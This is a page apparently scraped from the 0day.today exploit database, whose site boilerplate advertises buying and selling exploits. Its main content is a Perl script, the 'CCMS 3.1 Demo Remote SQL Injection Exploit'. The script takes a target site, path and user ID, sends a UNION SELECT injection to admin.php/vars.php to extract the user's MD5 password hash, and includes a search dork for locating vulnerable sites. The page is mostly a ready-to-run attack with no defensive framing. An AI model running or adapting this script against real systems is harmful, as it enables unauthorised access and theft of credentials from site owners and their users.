0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CCMS 3.1 Demo Remote SQL Injection Exploit
========================================== CCMS 3.1 Demo Remote SQL Injection Exploit ========================================== #!/usr/bin/perl #Found by Pr0metheuS #Coded by Pr0metheuS #Gr33tz-Team #Dork : intitle:"CCMS v3.1 Demo PW" print "______________________________________\n"; print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n"; print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n"; print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n"; print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n"; print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n"; print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n"; print "______________________________________\n"; print "[+] Enter SITE:\n"; $SITE = <STDIN>; chomp $SITE; print "[+] Enter PATH:\n"; $PATH = <STDIN>; chomp $PATH; print "[+] Enter USERID:\n"; $USERID = <STDIN>; chomp $USERID; print "______________________________________\n"; #Send Request use LWP::UserAgent; $ua = new LWP::UserAgent; $ua->agent("Mozilla/8.0"); $ua = LWP::UserAgent->new; my $req = HTTP::Request->new(GET => "$SITE$PATH/admin.php/vars.php?page=Console&p=1'+union+select+userid,2,3,PASSWORD+from+user+where+userid=$USERID/*"); $req->header('Accept' => 'text/html'); $res = $ua->request($req); $con = $res->content; #FIND MD5 IN TEXT REGEX !!! if ($con =~ "/([0-9a-fA-F]{32})/") { print "______________________________________\n"; print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n"; print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n"; print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n"; print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n"; print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n"; print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n"; print "[+] Exploit successful!\n"; print "[+] USERID:$USERID\n"; print "[+] MD5:$1\n"; print "______________________________________\n"; } else{ print "______________________________________\n"; print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n"; print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n"; print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n"; print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n"; print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n"; print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n"; print "[+] Exploit Failed!\n"; } # 0day.today [2024-11-15] #